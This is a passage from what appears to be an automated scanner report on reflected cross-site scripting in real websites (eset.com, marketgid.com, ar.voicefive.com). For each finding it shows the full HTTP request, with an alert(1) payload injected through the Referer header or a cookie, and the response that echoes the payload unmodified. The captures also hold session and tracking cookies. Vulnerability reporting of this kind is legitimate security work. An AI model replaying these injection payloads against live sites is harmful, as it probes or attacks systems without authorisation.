Cookie: tnt=3; PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); mbox=PC#1303736347554-914602.17#1304952767|check#true#1303743227|session#1303743154006-383984#1303745027; __utma=1.1646584456.1303732844.1303735979.1303743158.3; __utmc=1; __utmb=1.2.10.1303743158; s_pers=%20s_vnum%3D1335268844052%2526vn%253D3%7C1335268844052%3B%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%252C%255B%2527Other%252520Referrers-shopping.netsuite.com%2527%252C%25271303743170439%2527%255D%255D%7C1461595970439%3B%20s_visit%3D1%7C1303745017240%3B%20gpv_pageName%3Dus/new_homepage%7C1303745017242%3B%20s_nr%3D1303743217244-Repeat%7C1335279217244%3B%20s_invisit%3Dtrue%7C1303745017246%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cc%3Dtrue%3B%20s_cm%3Dundefinedshopping.netsuite.comshopping.netsuite.com%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/new_homepage%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/home/smart-security%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 25525
Date: Mon, 25 Apr 2011 15:18:50 GMT
X-Varnish: 555659225
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
on
the next lines. */
s.pageName="";
s.server="";
s.channel="Home";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=ec105"-alert(1)-"6412896c31";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

6.77. http://www.eset.com/us/store [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.eset.com
Path:	/us/store

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b284d"-alert(1)-"70192e64f96 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/store HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=b284d"-alert(1)-"70192e64f96
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.2.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738144522%3B%20gpv_pageName%3Dus/business/server-security/linux-file%7C1303738144526%3B%20s_nr%3D1303736344530-Repeat%7C1335272344530%3B%20s_invisit%3Dtrue%7C1303738144533%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/business/server-security/linux-file%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/business/products%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 38902
Date: Mon, 25 Apr 2011 12:59:41 GMT
X-Varnish: 1310980199
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>P
...[SNIP]...
n
the next lines. */
s.pageName="";
s.server="";
s.channel="Store";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=b284d"-alert(1)-"70192e64f96";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

6.78. http://www.eset.com/us/styles/store-new.css [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.eset.com
Path:	/us/styles/store-new.css

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 47973"-alert(1)-"4198eb1d78a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /us/styles/store-new.css HTTP/1.1
Host: www.eset.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=47973"-alert(1)-"4198eb1d78a
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=gnk9ss0g8a1obr4q9krd85j9a6; __utmz=1.1303735979.2.2.utmgclid=CLzn0qLPt6gCFQl_5Qod4S-RCA|utmccn=(not%20set)|utmcmd=(not%20set); __utma=1.1646584456.1303732844.1303732844.1303735979.2; __utmc=1; __utmb=1.2.10.1303735979; s_pers=%20s_cpmcvp%3D%255B%255B%2527KNC-g-nbag%2527%252C%25271303732844076%2527%255D%255D%7C1461585644076%3B%20s_vnum%3D1335268844052%2526vn%253D2%7C1335268844052%3B%20s_visit%3D1%7C1303738144522%3B%20gpv_pageName%3Dus/business/server-security/linux-file%7C1303738144526%3B%20s_nr%3D1303736344530-Repeat%7C1335272344530%3B%20s_invisit%3Dtrue%7C1303738144533%3B; s_sess=%20s_cpc%3D0%3B%20s_campaign%3DKNC-g-nbag%3B%20s_cm%3DundefinedKNC-g-nbagundefined%3B%20s_cc%3Dtrue%3B%20s_sq%3Desetprod%253D%252526pid%25253Dus/business/server-security/linux-file%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.eset.com/us/business/products%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: tnt=3; expires=Fri, 24-Jun-2011 13:02:15 GMT
Vary: User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 26712
Date: Mon, 25 Apr 2011 13:02:15 GMT
X-Varnish: 1310986158
Age: 0
Via: 1.1 varnish
Connection: keep-alive
X-Cache: MISS

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>E
...[SNIP]...
next lines. */
s.pageName="new_homepage";
s.server="";
s.channel="";
s.pageType="";
s.prop1="";
s.prop2="";
s.prop3="";
s.prop4="";
s.prop5="";
s.prop12="http://www.google.com/search?hl=en&q=47973"-alert(1)-"4198eb1d78a";
/* Conversion Variables */
s.campaign="";
s.state="";
s.zip="";
s.events="";
s.products="";
s.purchaseID="";
s.eVar1="";
s.eVar2="";
s.eVar3="";
s.eVar4="";
s.eVar5="";
/************* D
...[SNIP]...

6.79. http://www.marketgid.com/pnews/773204/i/7269/pp/2/1/ [Referer HTTP header] previous next

Summary

Severity:	Low
Confidence:	Certain
Host:	http://www.marketgid.com
Path:	/pnews/773204/i/7269/pp/2/1/

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload 8efb9<script>alert(1)</script>2ae95f37538 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /pnews/773204/i/7269/pp/2/1/ HTTP/1.1
Host: www.marketgid.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MGformStatus=2; __utma=250877338.2141066310.1303423654.1303423654.1303423654.1; __utmz=250877338.1303423654.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/14|utmcmd=referral; __gads=ID=909f464f6199feed:T=1303423666:S=ALNI_MY6fIaxdoRzO_fDyTrK1Li9f5G69A; __qca=P0-972785183-1303423664935
Referer: http://www.google.com/search?hl=en&q=8efb9<script>alert(1)</script>2ae95f37538

Response

HTTP/1.1 200 OK
Server: nginx/0.8.54
Date: Mon, 25 Apr 2011 14:33:37 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Keep-Alive: timeout=20
Set-Cookie: CookiePNewsPage=1; path=/; expires=Tue, 26-Apr-2011 14:33:37 GMT
Cache-Control: no-cache, must-revalidate
Content-Length: 48806

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<div id="mgnvgfd5yref" style="display:none">http://www.google.com/search?hl=en&q=8efb9<script>alert(1)</script>2ae95f37538</div>
...[SNIP]...

6.80. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the BMX_3PC cookie is copied into the HTML document as plain text between tags. The payload 1146c<script>alert(1)</script>154e165be29 was submitted in the BMX_3PC cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732017&AR_C=194941023 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:21 2011&prad=253732016&arc=181106347&; BMX_3PC=11146c<script>alert(1)</script>154e165be29; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303741228%2E986%2Cwait%2D%3E10000%2C

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:36:17 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=23&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:36:17 2011&prad=253732017&arc=194941023&; expires=Sun 24-Jul-2011 14:36:17 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25227

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732017",Pid:"p97174789",Arc:"194941023",Location:
...[SNIP]...
81479006": '1', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046', "BMX_3PC": '11146c<script>alert(1)</script>154e165be29', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:2
...[SNIP]...

6.81. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the BMX_G cookie is copied into the HTML document as plain text between tags. The payload 384b1<script>alert(1)</script>9c302d4a2ba was submitted in the BMX_G cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732017&AR_C=194941023 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:21 2011&prad=253732016&arc=181106347&; BMX_3PC=1; UID=875e3f1e-184.84.247.65-1303349046; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1303741228%2E986%2Cwait%2D%3E10000%2C384b1<script>alert(1)</script>9c302d4a2ba

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:36:21 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=23&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:36:21 2011&prad=253732017&arc=194941023&; expires=Sun 24-Jul-2011 14:36:21 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25227

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732017",Pid:"p97174789",Arc:"194941023",Location:
...[SNIP]...
={ "ar_p97174789": 'exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:20:21 2011&prad=253732016&arc=181106347&', "BMX_G": 'method%2D%3E%2D1%2Cts%2D%3E1303741228%2E986%2Cwait%2D%3E10000%2C384b1<script>alert(1)</script>9c302d4a2ba', "ar_s_p81479006": '1', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046', "B
...[SNIP]...

6.82. http://ar.voicefive.com/bmx3/broker.pli [UID cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the UID cookie is copied into the HTML document as plain text between tags. The payload f1285<script>alert(1)</script>7568065879e was submitted in the UID cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732016&AR_C=181106347 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p97174789=exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&; ar_s_p81479006=1; UID=875e3f1e-184.84.247.65-1303349046f1285<script>alert(1)</script>7568065879e

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:23:32 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:23:32 2011&prad=253732016&arc=181106347&; expires=Sun 24-Jul-2011 14:23:32 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303741412; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25132

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732016",Pid:"p97174789",Arc:"181106347",Location:
...[SNIP]...
84742&', "ar_s_p81479006": '1', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&', "UID": '875e3f1e-184.84.247.65-1303349046f1285<script>alert(1)</script>7568065879e', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:2
...[SNIP]...

6.83. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p81479006 cookie is copied into the HTML document as plain text between tags. The payload a6378<script>alert(1)</script>96b3feedbdd was submitted in the ar_p81479006 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732016&AR_C=181106347 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p91300630=exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&; ar_p90175839=exp=3&initExp=Sun Apr 24 15:20:22 2011&recExp=Sun Apr 24 15:20:23 2011&prad=3992125865291151&arc=6108747&; ar_p97174789=exp=21&initExp=Sun Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&; ar_p81479006=exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&a6378<script>alert(1)</script>96b3feedbdd; ar_s_p81479006=1; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 25 Apr 2011 14:23:29 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p97174789=exp=22&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon Apr 25 14:23:29 2011&prad=253732016&arc=181106347&; expires=Sun 24-Jul-2011 14:23:29 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1303741409; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 25132

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"253732016",Pid:"p97174789",Arc:"181106347",Location:
...[SNIP]...
Apr 24 12:09:48 2011&recExp=Sun Apr 24 16:50:29 2011&prad=253732016&arc=186884742&', "ar_p81479006": 'exp=1&initExp=Sun Apr 24 19:44:30 2011&recExp=Sun Apr 24 19:44:30 2011&prad=58779362&arc=40314462&a6378<script>alert(1)</script>96b3feedbdd', "ar_s_p81479006": '1', "ar_p91300630": 'exp=1&initExp=Thu Apr 21 01:24:06 2011&recExp=Thu Apr 21 01:24:06 2011&prad=1201632&arc=1442826&', "ar_p90175839": 'exp=3&initExp=Sun Apr 24 15:20:22 2011&
...[SNIP]...

6.84. http://ar.voicefive.com/bmx3/broker.pli [ar_p90175839 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p90175839 cookie is copied into the HTML document as plain text between tags. The payload dedf1<script>alert(1)</script>6a1a09355da was submitted in the ar_p90175839 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p97174789&PRAd=253732016&AR_C=181106347 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-1134822682510879&output=html&h=600&slotname=3061072279&w=160&lmt=1303759227&flash=10.2.154&url=http%3A%2F%2Fgames.webalta.ru%2F&dt=1303741227549&bpp=5&shv=r20110420&jsv=r20110415&correlator=1303741227571&frm=0&adk=1110337129&ga_vid=973557293.1303741228&ga_sid=1303741228&ga_hid=154889240&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1125&bih=929&fu=0&ifi=1&dtd=35&xpc=naYdoqC7iz&p=http%3A//games.webalta.ru
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
